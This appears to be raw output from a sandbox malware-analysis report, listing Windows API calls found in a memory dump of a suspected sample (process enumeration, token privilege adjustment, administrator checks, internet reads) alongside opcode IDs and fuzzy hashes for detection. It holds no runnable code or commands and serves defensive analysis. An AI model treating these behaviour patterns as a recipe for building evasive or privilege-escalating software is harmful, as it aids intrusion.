                                              • String ID:
                                              • API String ID: 674341424-0
                                              • Opcode ID: 18f3c238f79b49804593693513fb0f512ec8382d50d19a50edaed87bb49c54ff
                                              • Instruction ID: 72cd3a0a32067020924cb736e64493ab0f8e7dee43ddb8492cbe5d13b4d82133
                                              • Opcode Fuzzy Hash: 18f3c238f79b49804593693513fb0f512ec8382d50d19a50edaed87bb49c54ff
                                              • Instruction Fuzzy Hash: E02289716083019FCB24DF24C891B6EB7E4EF85710F1449ADF89A97391DB75EA08CB92
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00BCEE3D
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00BCEE4B
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00BCEF0B
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BCEF1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: 1504575f3241c3fc73035573bf9223a4d581d25dec0924897bbc267618c0edc1
                                              • Instruction ID: 229eeb0aceca8f13619c60a27eb6843187a9b7ef92bc2644c9df850f144654d6
                                              • Opcode Fuzzy Hash: 1504575f3241c3fc73035573bf9223a4d581d25dec0924897bbc267618c0edc1
                                              • Instruction Fuzzy Hash: CD515A71508311ABD320EF24DC85F6BB7E8EF94750F1048ADF995972A1EB70E908CB92
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • GetCursorPos.USER32(?), ref: 00BDC4D2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B8B9AB,?,?,?,?,?), ref: 00BDC4E7
                                              • GetCursorPos.USER32(?), ref: 00BDC534
                                              • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B8B9AB,?,?,?), ref: 00BDC56E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                              • String ID:
                                              • API String ID: 1423138444-0
                                              • Opcode ID: 8c90d1c85285b6c846ff5108c216ae2195b3c097418f5d1491061d962f22566d
                                              • Instruction ID: 7fbc241000135038ad5f8dc724c1522b03951703d867499f51a2364b6a4b0498
                                              • Opcode Fuzzy Hash: 8c90d1c85285b6c846ff5108c216ae2195b3c097418f5d1491061d962f22566d
                                              • Instruction Fuzzy Hash: E731A035600018EFCB158F98D899EEEBFF5EB4A314F0440A6F9058B3A1DB31AD50DBA4
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00B512D8
                                              • GetClientRect.USER32(?,?), ref: 00B8B5FB
                                              • GetCursorPos.USER32(?), ref: 00B8B605
                                              • ScreenToClient.USER32(?,?), ref: 00B8B610
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                              • String ID:
                                              • API String ID: 1010295502-0
                                              • Opcode ID: 6059faa924765350d4718e580211d4eb16eaa756625bd44549b69c6a4499d863
                                              • Instruction ID: 31b9e1e43056c6b4cd683374c1fcc8cb351ce029f41caa58a9645e9f6d289da3
                                              • Opcode Fuzzy Hash: 6059faa924765350d4718e580211d4eb16eaa756625bd44549b69c6a4499d863
                                              • Instruction Fuzzy Hash: 97111935501019FBCB00DF98D885AFEB7F8EB05305F404896E901E7250D731AA55CBA5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID:
                                              • API String ID: 3964851224-0
                                              • Opcode ID: 42d7b7d5bf3f8c9f47c12882ba2a38d260db85f65c83bf3f4ae906c25e01fd42
                                              • Instruction ID: 133d1a8b40bba1d40241dbc6521b2dd5999847779754aa9a6dec850a18d46ff2
                                              • Opcode Fuzzy Hash: 42d7b7d5bf3f8c9f47c12882ba2a38d260db85f65c83bf3f4ae906c25e01fd42
                                              • Instruction Fuzzy Hash: 769236706183419FDB24EF15C480B2BB7E1FB89304F1489ADE89A9B362D775EC45CB92
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BAE628
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($|
                                              • API String ID: 1659193697-1631851259
                                              • Opcode ID: 1d7faa32564c724d331ac05738d62806c0d1340193a3a06efcbd03a931916785
                                              • Instruction ID: f3a986dac47a90d9476cbb93ac6e405ee8c54c8299c3357fa155c59bb5743baa
                                              • Opcode Fuzzy Hash: 1d7faa32564c724d331ac05738d62806c0d1340193a3a06efcbd03a931916785
                                              • Instruction Fuzzy Hash: 26322475A047059FDB28CF59C48196AB7F1FF48320B15C4AEE8AADB3A1E770E941CB40
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BC180A,00000000), ref: 00BC23E1
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BC2418
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: 036c7eb5e98e211a494fc7f2f9296353b8eb51f837e10a0d42bfb09ab3292d22
                                              • Instruction ID: 031299da017675b9bc7607d995de80fccc4303d4bbea2a535dce817f2d3cf9ca
                                              • Opcode Fuzzy Hash: 036c7eb5e98e211a494fc7f2f9296353b8eb51f837e10a0d42bfb09ab3292d22
                                              • Instruction Fuzzy Hash: 4741E271A04209BFEB209F95DC81FBBB7FCEB80714F1040AEF615A7240EA749E419664
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBB40B
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BBB465
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BBB4B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: ddb221b76f5dbf3c028240f3085b5eebe0e10c3a8b72ebbd78ac0b2c9b658e27
                                              • Instruction ID: 5f56843f3f2d45db027d8df14923181b0ca9586a466ba5b8fcbd272a43d0d4f9
                                              • Opcode Fuzzy Hash: ddb221b76f5dbf3c028240f3085b5eebe0e10c3a8b72ebbd78ac0b2c9b658e27
                                              • Instruction Fuzzy Hash: 6D214A75A00518EFCB00EFA5D890AFDBBF8FF49311F1480AAE905AB361DB319919CB51
                                              APIs
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                              • GetLastError.KERNEL32 ref: 00BA8865
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: 6dab45450c638d4efdcae50f5228ca30f3ac4ceff36cd7f6c0bcd3e650e53762
                                              • Instruction ID: 2e161c6c4d6b07ba67ee330a809a927d5372e2fb7ca59bea94c2b34ba94f69c1
                                              • Opcode Fuzzy Hash: 6dab45450c638d4efdcae50f5228ca30f3ac4ceff36cd7f6c0bcd3e650e53762
                                              • Instruction Fuzzy Hash: 2B1160B1818305AFD718EF94DC85D6BB7F8EB45710B10856EE45A97641EE34AC408B60
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA8774
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA878B
                                              • FreeSid.ADVAPI32(?), ref: 00BA879B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: c3199297661d0ba3b05b91fc02c48cdc14f8a476ab8d46f282da88681596a0ed
                                              • Instruction ID: d8ca4e9ae32616991e549c8adb50b1ef13be0524479796e2536d6d164a00e8a9
                                              • Opcode Fuzzy Hash: c3199297661d0ba3b05b91fc02c48cdc14f8a476ab8d46f282da88681596a0ed
                                              • Instruction Fuzzy Hash: 7AF04F7591530DBFDF00DFF4DC99ABDBBBCEF08201F5044A9A502E3281E6715A048B50
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • GetParent.USER32(?), ref: 00B8B7BA
                                              • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00B519B3,?,?,?,00000006,?), ref: 00B8B834
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogNtdllParentProc_
                                              • String ID:
                                              • API String ID: 314495775-0
                                              • Opcode ID: 1fd35ef2f26a2460d788d697f3bbabb5f821aa97d3639bd1ac8d9a35adc0342a
                                              • Instruction ID: fa86b94eb9f8b89c006c658f7d7b77031c8d76b1512f58c2747ff332f009baa8
                                              • Opcode Fuzzy Hash: 1fd35ef2f26a2460d788d697f3bbabb5f821aa97d3639bd1ac8d9a35adc0342a
                                              • Instruction Fuzzy Hash: 4721CE78201504AFDB209B2CC884FA93BE6EF4A321F5842D0F9255B2F2C7309E55DB50
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBC6FB
                                              • FindClose.KERNEL32(00000000), ref: 00BBC72B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 3b6aa9e81d66fb32ea4991fa4b28d88972052944be04de8938a10cde16b4cb42
                                              • Instruction ID: 571586f073e2a353af14dff12f3723585fdcec254356e8f3b2677b62bce6e980
                                              • Opcode Fuzzy Hash: 3b6aa9e81d66fb32ea4991fa4b28d88972052944be04de8938a10cde16b4cb42
                                              • Instruction Fuzzy Hash: E21182716046049FDB10DF29C855A6AF7E5EF45361F04855EF8A58B290DB70AC05CF81
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00B8B93A,?,?,?), ref: 00BDC5F1
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00BDC5D7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogMessageNtdllProc_Send
                                              • String ID:
                                              • API String ID: 1273190321-0
                                              • Opcode ID: c5770ac0f15d1d0b702f60a3e75e3750d2d93eb1f70dc3258738cfc498362e17
                                              • Instruction ID: 32a7a22fc7091f3013df0673fb9e6d65f62873b29b12321d061a18bbb55aadeb
                                              • Opcode Fuzzy Hash: c5770ac0f15d1d0b702f60a3e75e3750d2d93eb1f70dc3258738cfc498362e17
                                              • Instruction Fuzzy Hash: BA01F530201205EBDB255F14EC95F6ABFE6FB96328F0441A6FD051B3E0DB31A801DB90
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00BDC961
                                              • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00B8BA16,?,?,?,?,?), ref: 00BDC98A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClientDialogNtdllProc_Screen
                                              • String ID:
                                              • API String ID: 3420055661-0
                                              • Opcode ID: d9111f54b954b032bedf375cbd584f366b0634c3b5a083e1d0bf90fa333b7f63
                                              • Instruction ID: a313dc204252dd78a4876192e73f22025a450e30b9cb7fc13537b7939edef1f0
                                              • Opcode Fuzzy Hash: d9111f54b954b032bedf375cbd584f366b0634c3b5a083e1d0bf90fa333b7f63
                                              • Instruction Fuzzy Hash: EFF01D72401118FFEB058F45DC19ABEBBB9FB48311F14415AF90152161D7716A51DBA4
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA097
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA0A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: ed04976ea06df65f9682e70db53b8cfac670b8530563a5b6152ce333a6966981
                                              • Instruction ID: 27391c8ca56d3dcfeb052199035b5e3fe7eb0446323b8ca16cf3642d68163259
                                              • Opcode Fuzzy Hash: ed04976ea06df65f9682e70db53b8cfac670b8530563a5b6152ce333a6966981
                                              • Instruction Fuzzy Hash: 3EF0823554522EBBDB21AFA4DC48FFA77ACFF08361F0041A6F909D7191DA709944CBA1
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BDCA84
                                              • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00B8B995,?,?,?,?), ref: 00BDCAB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
